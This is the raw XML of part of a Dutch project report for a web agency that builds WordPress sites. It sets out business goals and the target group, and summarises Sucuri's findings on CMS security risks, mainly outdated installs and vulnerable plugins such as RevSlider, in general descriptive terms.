        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="36A22D62" w14:textId="29DC7878" w:rsidR="00272E09" w:rsidRDefault="00394B19" w:rsidP="002F3E27">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252130304" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6ABCAEEC" wp14:editId="46730BFF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-910416</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1134528</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624FC" id="Rectangle 61" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.7pt;margin-top:-89.3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" fillcolor="#70ad47 [3209]" strokecolor="#70ad47" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="002B7C65">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00272E09" w:rsidRPr="00272E09">
        <w:t>Tabel 2.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5841BA37" w14:textId="77777777" w:rsidR="002B7C65" w:rsidRDefault="005C6FF5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C6FF5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Business doelen verfijnen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBAF03A" w14:textId="6C91AFA9" w:rsidR="00F5420D" w:rsidRPr="002B7C65" w:rsidRDefault="003A6872">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>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GridTable4-Accent6"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2827"/>
        <w:gridCol w:w="5670"/>
      </w:tblGrid>
      <w:tr w:rsidR="0067285E" w14:paraId="086F346B"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AD76EA0" w14:textId="4512F2C0" w:rsidR="00773357" w:rsidRDefault="001A5781">
            <w:r>
              <w:t>Business Doelen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5670" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05BB95D1" w14:textId="6B4F8F94" w:rsidR="00773357" w:rsidRDefault="001A5781">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Verfijnde doelen (Engineering Objectieven)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0067285E" w14:paraId="39FD098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7FAA5C8E" w:rsidR="001473B4" w:rsidRDefault="00BA29E1">
                  <w:r>
                    <w:t>Een Client applicatie voor de klant</w:t>
                  </w:r>
                  <w:r w:rsidR="00F74324">
                    <w:t xml:space="preserve"> wat dient als</w:t>
                  </w:r>
                  <w:r w:rsidR="00B52E66">
                    <w:t xml:space="preserve"> Endpoint</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pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0067285E" w14:paraId="35263258" w14:textId="77777777" w:rsidTr="005A427C">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>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pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1A3B9026" w14:textId="0A066558" w:rsidR="00505582" w:rsidRDefault="00972417">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00272E09">
        <w:t>Tabel 2.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7989982A" w14:textId="5DCCFB45" w:rsidR="00D12EE6" w:rsidRDefault="002B7C65">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253189120" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1BD06A79" wp14:editId="621FD09F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-908685</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-916131</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AB9C5" id="Rectangle 448" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.55pt;margin-top:-72.1pt;width:25pt;height:1031.7pt;z-index:-2501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NO5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ndKvsq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" fillcolor="#70ad47 [3209]" strokecolor="#70ad47"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40D8261F"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p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent6"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2222"/>
        <w:gridCol w:w="3094"/>
        <w:gridCol w:w="2015"/>
        <w:gridCol w:w="1685"/>
      </w:tblGrid>
      <w:tr w:rsidR="005653E3" w14:paraId="11DF6E47" w14:textId="5463FAB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pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Verfijnde doelen (Engineering Objectieven)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2022" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E1E937B" w14:textId="2149EE4F" w:rsidR="005653E3" w:rsidRDefault="005653E3" w:rsidP="008B56CF">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Kwaliteit Attribuut</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A96194C" w14:textId="3B1A16B4" w:rsidR="005653E3" w:rsidRDefault="005653E3" w:rsidP="008B56CF">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Prioriteit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005653E3" w14:paraId="4A6ACDC7" w14:textId="0B5531C9" w:rsidTr="007A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68"/>
            </w:tblGrid>
            <w:tr w:rsidR="005653E3" w14:paraId="4F3420DB" w14:textId="77777777" w:rsidTr="00195C12">
              <w:trPr>
                <w:trHeight w:val="627"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="5556" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="7A66A77B" w14:textId="20A61BD3" w:rsidR="005653E3" w:rsidRDefault="005653E3" w:rsidP="008B56CF">
                  <w:r>
                    <w:t>Een Client applicatie voor de klant wat di</w:t>
                  </w:r>
                  <w:r w:rsidR="007C0957">
                    <w:t>ent als Endpoint.</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r>
      <w:tr w:rsidR="005653E3" w14:paraId="5D400583" w14:textId="2C91D7D7" w:rsidTr="007A4755">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>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6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r>
    </w:tbl>
    <w:p w14:paraId="3FCD1581" w14:textId="5B59F8FF" w:rsidR="00DF41B1" w:rsidRPr="00DF41B1" w:rsidRDefault="002F3E27" w:rsidP="00DF41B1">
      <w:r>
        <w:t>Tabel 2.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BDBAA7" w14:textId="0CD7BCEF" w:rsidR="009004E6" w:rsidRPr="009004E6" w:rsidRDefault="006A5AE7" w:rsidP="00971D60">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.2 Doelgroep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2540C3" w14:textId="576D9F7C" w:rsidR="008A79F1" w:rsidRDefault="005F0E84" w:rsidP="008A79F1">
      <w:r>
        <w:t>S5 ontwikkelt en onderhoudt website voor MKB-bedrijven. De websites</w:t>
      </w:r>
      <w:r w:rsidR="008A79F1">
        <w:t xml:space="preserve"> worden over het algemeen ontwikkeld in de </w:t>
      </w:r>
      <w:r w:rsidR="00215BAE">
        <w:t>CMS</w:t>
      </w:r>
      <w:r w:rsidR="008A79F1">
        <w:t xml:space="preserve"> Wordpress</w:t>
      </w:r>
      <w:r w:rsidR="00414824">
        <w:t xml:space="preserve">. WordPress heeft zijn </w:t>
      </w:r>
      <w:r w:rsidR="008A79F1">
        <w:t>CMS in de taal PHP ontwikkeld en</w:t>
      </w:r>
      <w:r w:rsidR="00091D46">
        <w:t xml:space="preserve"> heeft daarvoor een</w:t>
      </w:r>
      <w:r w:rsidR="008A79F1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00091D46">
        <w:t>eigen framework voor gebruikt.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent6"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4531"/>
      </w:tblGrid>
      <w:tr w:rsidR="00971D60" w14:paraId="2C5E93E5" w14:textId="7777777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7F2A81" w14:textId="0BC7371A" w:rsidR="00971D60" w:rsidRDefault="00971D60" w:rsidP="00731588">
            <w:r>
              <w:t>Doelgroep</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00971D60" w14:paraId="1071CCC0" w14:textId="77777777" w:rsidTr="007A475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531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F3CEE04" w14:textId="5E28BF79" w:rsidR="00971D60" w:rsidRDefault="00971D60" w:rsidP="008A79F1">
            <w:r>
              <w:t>Particulier die eigenaar is van een Wordpress website</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00971D60" w14:paraId="766761CF" w14:textId="77777777" w:rsidTr="007A4755">
        <w:trPr>
          <w:trHeight w:val="209"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="186891F9" w14:textId="244739ED" w:rsidR="00971D60" w:rsidRDefault="00971D60" w:rsidP="00971D60">
            <w:r>
              <w:t xml:space="preserve">Bedrijf die eigenaar is van een Wordpress website </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3D2F3AFA" w14:textId="64433CEC" w:rsidR="00B76760" w:rsidRDefault="00272E09" w:rsidP="008A79F1">
      <w:r>
        <w:t>Tabel 2.</w:t>
      </w:r>
      <w:r w:rsidR="005330B9">
        <w:t>8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61098138" w14:textId="478D1574" w:rsidR="001428EA" w:rsidRDefault="00FE7016" w:rsidP="001D4CC8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.2.1 </w:t>
      </w:r>
      <w:r w:rsidR="00CE1951">
        <w:t>Wordpress op gebied van security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1A0FC4" w14:textId="77777777" w:rsidR="001D4CC8" w:rsidRPr="001D4CC8" w:rsidRDefault="001D4CC8" w:rsidP="001D4CC8"/>
    <w:p w14:paraId="282AA586" w14:textId="6243EC70" w:rsidR="00B84DAB" w:rsidRDefault="001F0841" w:rsidP="008A79F1">
      <w:r>
        <w:t>Websites</w:t>
      </w:r>
      <w:r w:rsidR="008A79F1">
        <w:t xml:space="preserve"> die</w:t>
      </w:r>
      <w:r w:rsidR="00EA23F9">
        <w:t xml:space="preserve"> ontwikkeld zijn in Wordpress </w:t>
      </w:r>
      <w:r w:rsidR="008A79F1">
        <w:t>zijn kwetsbaar voor cyberaanvallen. 27% procent van alle websites draaien op WordPress en het heeft 60% van het marktaandeel als het gaa</w:t>
      </w:r>
      <w:r w:rsidR="00AE5045">
        <w:t>t om CMS’s</w:t>
      </w:r>
      <w:r w:rsidR="008A79F1">
        <w:t xml:space="preserve"> (T</w:t>
      </w:r>
      <w:r w:rsidR="008A79F1" w:rsidRPr="00205B00">
        <w:t>orquemag</w:t>
      </w:r>
      <w:r w:rsidR="008A79F1">
        <w:t>, 2xx</w:t>
      </w:r>
      <w:r w:rsidR="00C7574C">
        <w:t>x). Dit betekent</w:t>
      </w:r>
      <w:r w:rsidR="00385B76">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00C7574C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C8026A">
        <w:t>in theorie</w:t>
      </w:r>
      <w:r w:rsidR="00385B76">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00C8026A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C7574C">
        <w:t>dat als het CMS</w:t>
      </w:r>
      <w:r w:rsidR="008A79F1">
        <w:t xml:space="preserve"> een kwetsbaarheid heeft</w:t>
      </w:r>
      <w:r w:rsidR="00354F26">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="008A79F1">
        <w:t xml:space="preserve"> dan zijn 27% van alle websites kwetsbaar </w:t>
      </w:r>
      <w:r w:rsidR="00EA23F9">
        <w:t>voor cyberaanvallen. Ithemes</w:t>
      </w:r>
      <w:r w:rsidR="008A79F1">
        <w:t xml:space="preserve"> vermeld in het artikel “is WordPress Really Secure?” dat de WordPress CMS kampt met securityproblemen. De securityproblemen komen van drie componenten af: WordPress Core, WordPress </w:t>
      </w:r>
      <w:r w:rsidR="001F0774">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253168640" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1385B1C5" wp14:editId="045ECA77">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-911460</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-915035</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="772" name="Rectangle 77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129E2" id="Rectangle 772" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.75pt;margin-top:-1in;width:25pt;height:1031.7pt;z-index:-2501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OzJ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m004s6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" fillcolor="#70ad47 [3209]" strokecolor="#70ad47" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="008A79F1">
        <w:t>themes, WordPress plugins. De grootste deel van de security kwetsbaarheden komt niet af van de Kern van WordPress maar van de WordPress plugins. De WordPress plugins rekenen vo</w:t>
      </w:r>
      <w:r w:rsidR="00330FA9">
        <w:t>or 52% van alle kwetsbaarheden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6351A091" w14:textId="3BE2ED53" w:rsidR="00B84DAB" w:rsidRPr="009B46E2" w:rsidRDefault="00484743" w:rsidP="009B46E2">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253191168" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="43F7AA5C" wp14:editId="3D4244E3">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-918210</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1138851</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="753" name="Rectangle 7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C4F3C" id="Rectangle 753" o:spid="_x0000_s1026" style="position:absolute;margin-left:-72.3pt;margin-top:-89.6pt;width:25pt;height:1031.7pt;z-index:-2501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" fillcolor="#70ad47 [3209]" strokecolor="#70ad47" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="009B46E2" w:rsidRPr="009B46E2">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Securi Rapport</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D89C2C0" w14:textId="0E0DA0EA" w:rsidR="00B84DAB" w:rsidRDefault="00B84DAB" w:rsidP="00B84DAB">
      <w:r>
        <w:t>Er zijn ongeveer</w:t>
      </w:r>
      <w:r w:rsidR="00C942D8">
        <w:t xml:space="preserve"> 1 miljard websites online en het</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> aantal blijft maar stijgen. De kracht achter deze stijging  zijn Content Management Systemen (CMS). Deze technologieën maken het mogelijk om gemakkelijk een simpele website op te zetten, het enige wat een persoon nodig heeft is een host en een installatie van één van de grote CMS systemen, deze zijn: WordPress, Joomla, Drupal en Magento. Om het nog makkelijker te maken bieden sommige host als Digital Ocean een geautomatiseerde CMS installatie aan. De explosie van CSM technologieën heeft ervoor gezorgd dat een derde van alle websites aangedreven door zulke soort CMS applicaties. Wordpress leidt met 60% op de CMS markt en heeft dus de grootste marktaandeel. Andere CMS platforms concentreren zich meer op niche markten zoals Magento voor e-commerce en Drupal voor grote bedrijfssystemen. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3901250E" w14:textId="1F141215" w:rsidR="00B84DAB" w:rsidRDefault="00B84DAB" w:rsidP="00B84DAB">
      <w:r>
        <w:t>Elke particulier kan een host en domein kopen en daar een WordPress, Magento of Drupal instantie op instaleren. Sucuri noemt dit fenomeen User A</w:t>
      </w:r>
      <w:r w:rsidRPr="0087653F">
        <w:t>doption</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, dit zorgt ervoor er een grote vloed aan ongeschoolde webmasters en service providers verantwoordelijk zijn voor het ontwikkelen en onderhouden van websites. Dat blijkt uit de analyse die Sucuri in het eerste kwartaal van 2016 heeft gedaan, waarin vermeld wordt dat uit de 11,000 geïnfecteerde websites die geanalyseerd zijn, 75% gebruik maken van de platform WordPress. Wat ook een groot probleem blijkt te zijn is het updaten van CMS platformen en dit komt mededankzij de ongeschoolde, onervaren webmasters die liever geen tijd besteden aan het onderhouden van hun websites. Er wordt geschat dat 50% van WordPress website niet up-to-date zijn en voor CMS platformen die minder nadruk leggen op compatibiliteit met eerdere versies is het percentage nog hoger, 80%. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF753BD" w14:textId="2FBABA0F" w:rsidR="00B84DAB" w:rsidRDefault="00B84DAB" w:rsidP="00B84DAB">
      <w:r>
        <w:t xml:space="preserve">Voor het eerste kwartaal van 2016 heeft Sucuri een aantal CMS platformen geanalyseerd op kwetsbaarheden binnen het systeem. Het resultaat van Sucuri’s laat zien dat de drie meest geïnfecteerde CMS platformen zijn WordPress, Joombla en Magento. Tijdens de kwetsbaarheid analyse is er meer naar de installatie, configuratie, en algemene onderhoudt door de webmasters dan de kern van de CMS platformen. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5468B4" w14:textId="49360DF7" w:rsidR="00B84DAB" w:rsidRDefault="00B84DAB" w:rsidP="00B84DAB">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00A53060" wp14:editId="3FB1D505">
            <wp:extent cx="5486400" cy="3200400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="67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5DC56E" w14:textId="77777777" w:rsidR="00B84DAB" w:rsidRDefault="00B84DAB" w:rsidP="00B84DAB"/>
    <w:p w14:paraId="63E1AD22" w14:textId="77777777" w:rsidR="00AD3BA3" w:rsidRDefault="00AD3BA3" w:rsidP="00B84DAB"/>
    <w:p w14:paraId="6C0F5C2C" w14:textId="77777777" w:rsidR="00F27A73" w:rsidRDefault="00F27A73" w:rsidP="00B84DAB"/>
    <w:p w14:paraId="1FDA2032" w14:textId="3CEF9D42" w:rsidR="009B46E2" w:rsidRPr="009B46E2" w:rsidRDefault="00F27A73" w:rsidP="00B84DAB">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253193216" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7F198C1A" wp14:editId="38594810">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-909651</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1254377</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="756" name="Rectangle 7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04C03" id="Rectangle 756" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.65pt;margin-top:-98.7pt;width:25pt;height:1031.7pt;z-index:-2501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hp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" fillcolor="#70ad47 [3209]" strokecolor="#70ad47" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="009B46E2" w:rsidRPr="009B46E2">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Out-of-date</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F785A6A" w14:textId="1747EA2E" w:rsidR="00B84DAB" w:rsidRDefault="00B84DAB" w:rsidP="00B84DAB">
      <w:r>
        <w:t xml:space="preserve">CMS platformen moedigen software ontwikkelaars aan om extensies te maken om nieuwe features aan de systemen toe te voegen. Maar wat de CMS platformen niet willen zijn extensies met kwetsbaarheden, jammer genoeg is hier niet voldoende zicht op en wordt er niet veel aan kwaliteit controle gedaan. Dit zorgt ervoor dat de meeste kwetsbaarheden te vinden zijn in extensies. Er kunnen kwetsbaarheden te vinden zijn in de kern van de CMS systemen maar, deze zijn nog te onderhouden door het uitgeven van patches, mits de webmaster de CMS systeem niet up-to-date houdt. Extensies kunnen door iedereen met een beetje software ontwikkeling kennis gemaakt worden. De security problemen ontstaan wanneer ongeschoolde, onervaren software ontwikkelaars zwak beveiligde software vrijgeven als CMS extensies. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57316FC5" w14:textId="5EC2AC17" w:rsidR="00B84DAB" w:rsidRDefault="00B84DAB" w:rsidP="00B84DAB">
      <w:r>
        <w:t xml:space="preserve">De drie extensies die de meeste websites hebben geïnfecteerd met kwetsbaarheden zijn RevSlider, GravityForms, en TimThumb. In 2014 heeft Sucuri een onderzoek gedaan naar de RevSlider en een artikel gepubliceerd dat er meer dan 100,000 websites getroffen zijn door een malware die zijn aanval richt op de plugin RevSlider. De security probleem doet zich voor in de Premium versie van de RevSlider. De kwetsbaarheid zorgt ervoor dat hackers elke bestand van de server kan downloaden. Dit wordt vooral gebruikt om inloggegevens te stelen van de database. Gebruikers moeten voorzichtig zijn bij het gebruiken van derde partij plugins en goed onderzoek doen naar rapporten die geschreven zijn over de plugins op gebied van security. Zo kunnen zij voorkomen dat zij een doelwit worden voor cyberaanvallen van hackers. Magento maakt ook gebruik van derde partij plugins en doet blijkbaar ook niet genoeg aan kwaliteit controle. De Magento extensie ShopLift Supee is een ander voorbeeld van een kwetsbare extensie. Hackers gebruiken de exploiteer technieken SQL Injecties en XSS aanvallen om administratie accounts toe te voegen aan het systeem.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E99BB8D" w14:textId="650B32A3" w:rsidR="00B84DAB" w:rsidRDefault="00B84DAB" w:rsidP="00B84DAB">
      <w:r>
        <w:t>Zoals nu duidelijk is zijn de extensies de meest voorkomende bron van kwetsbaarheden maar niet de enige. Het security probleem waar Sucuri naar refereert als Out-of-date is een al sinds dat de eerste stukje onbeveiligde code een dreiging voor de website. H</w:t>
      </w:r>
      <w:r w:rsidR="00A63E53">
        <w:t xml:space="preserve">ackers vinden met genoeg tijd, </w:t>
      </w:r>
      <w:r>
        <w:t>motivatie en voorzieningen een manier om de software kwetsbaarheid te exploiteren</w:t>
      </w:r>
      <w:r w:rsidR="00FE13F0">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEAB9DE" w14:textId="77777777" w:rsidR="00CC4F6B" w:rsidRDefault="00B84DAB" w:rsidP="00C94890">
      <w:pPr>
        <w:keepNext/>
        <w:sectPr w:rsidR="00CC4F6B" w:rsidSect="00241096">
          <w:headerReference w:type="default" r:id="rId25"/>
          <w:headerReference w:type="first" r:id="rId26"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C1661E0" wp14:editId="044497BC">
            <wp:extent cx="5486400" cy="3200400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
